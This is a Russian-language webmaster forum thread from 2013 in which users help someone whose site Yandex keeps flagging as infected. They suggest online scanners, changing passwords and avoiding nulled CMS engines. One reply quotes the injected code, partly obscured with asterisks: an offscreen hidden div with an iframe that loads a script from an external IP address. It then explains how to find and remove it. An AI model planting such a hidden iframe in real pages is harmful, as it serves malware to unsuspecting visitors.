Попробуйте проверить через antivirus-alarm.ru иногда он даже что то дельное показывает.
- 08.03.2013 23:09
- 0
- 08.03.2013 23:11
этим совету
sitecheck.sucuri.net/scanner/- 0
- 08.03.2013 23:42Студент
- Регистрация: 29.12.2012
- Сообщений: 46
- Репутация: 0
Меня смущает 2 вещи,которые не могу понять:
1. Если есть вирус, то он должен быть постоянно,почему в течении месяца Яндес раз 10 уже написал,то есть вирус, то вируса не обнаружено.При том,что ничего конкретного вообще не делалось
2.На хостинге 80 процентов сайтов выводятся с пометкой (угожает безопасности) ,я проверял выборочно,точно также ,в 1 день какойто сайт в выдаче Яндекса покажет зараженный,во втрой день этот же сайт в выдаче именно Яндекса--чистый.
P.S.все пароли уже раз 5 меняли,движок обновили- 0
12.09.2013 22:17andys1, а вообще, мой вам совет: лучше не использовать нуленные движки. Недобросовестные хацкеры часто оставляют там сюрпризы для веб-мастеров.
Кстати вирус может срабатывать на определенные устройства, как пример. Или ваш антивирус молча блокирует его. Всё же стоит поискать в файлах тот ip адресок...- 0
- 12.09.2013 23:13Дедушка ЭМО
- Регистрация: 23.09.2010
- Сообщений: 735
- Репутация: 495
Я так понял, что это не весь вредоносный код.
<style>.hp60pdz1o { position:absolute; left:-1256px; top:-1442px} </style>-это показывает где выводится <div>.hp60pdz1o</div>
<div class="hp60pdz1o"><iframe *src="ht*p://129.121.35.250/b269c38185437d0f310fbd187c089f92/q.php" width="389" height="473"></iframe> это показывает, как выводится , в данном случае размер окна всплывающего 398*473, в нем отрывается исполняемый файл с адреса ]http://129.121.35.250/b269c38185437d0f310fbd187c089f92/q.php
Видимо, есть что-то в коде, что создает этот <div>.hp60pdz1o</div>.
Я проверять, что там по адресу не стал.
Скачал бы на комп весь и проверил в редакторе на ".hp60pdz1o" и"http://129.121.35.*." и "b269c38185437d0f310fbd187c089f92/q.php" - все совпадения удалил. Потом проверил работоспособность кода.- 0
- 13.09.2013 02:57Студент
- Регистрация: 27.09.2012
- Сообщений: 74
- Репутация: 7
У вас iframe висит на сайте, сдвинутый в невидимую область. С айпишника в него подтягивается скрипт с вирусом или с кодом, считающимся вредоносным. Скорее всего он закодирован base64, и прогонять все файлы необходимо по слову base64, а затем расшифровывать. Хотя бывает и в наглую вставляют, не шифруя. Здесь поискать стоит по hp60pdz1o. Сливаете все файлы на комп и прогоняете поиском в файлах Тотал Коммандера. Найденный код корректно удалить.
- 0
- 13.09.2013 03:23Студент
- Регистрация: 11.02.2003
- Сообщений: 42
- Репутация: 18
batik, антивирус не найдет хрень в скриптах. Странно что никто не подсказал http://www.revisium.com/ai/ - для начала хватит.
Если не вылечит - будем принимать более действенные методы.
Надеюсь, про смену паролей лишний раз говорить не надо:)- 0
Тэги топика:
Похожие темы
| Темы | Раздел | Ответов | Последний пост |
|---|---|---|---|
Вирус на сайте? | Вопросы от новичков | 19 | 24.09.2012 17:01 |
Вирус на сайте. | WordPress | 2 | 07.04.2012 21:23 |
Вирус на сайте. | Web программирование | 1 | 03.04.2012 13:25 |
Вирус на сайте | Софт, скрипты, сервисы | 27 | 15.02.2010 21:41 |
addurl adsense canon google proxy telegram vkontakte youtube zennoposter аккаунт база бесплатный блог быть витрина вконтакт вопрос данный добавить домен есть купить лицензия магазин можно новый нужный отзыв парсер первый поинтовый понедельник продажа прокси работа работать регистрация сайт сбор сделать сертификат сеть система создание софт список средство ссылка стать статья стоимость тариф тема товар трафик форум хватать цель цена шаблон
Тем:
77,525Сообщений:
762,087Пользователей:
30,078Сейчас на сайте:
0 пользователей и 126 гостей
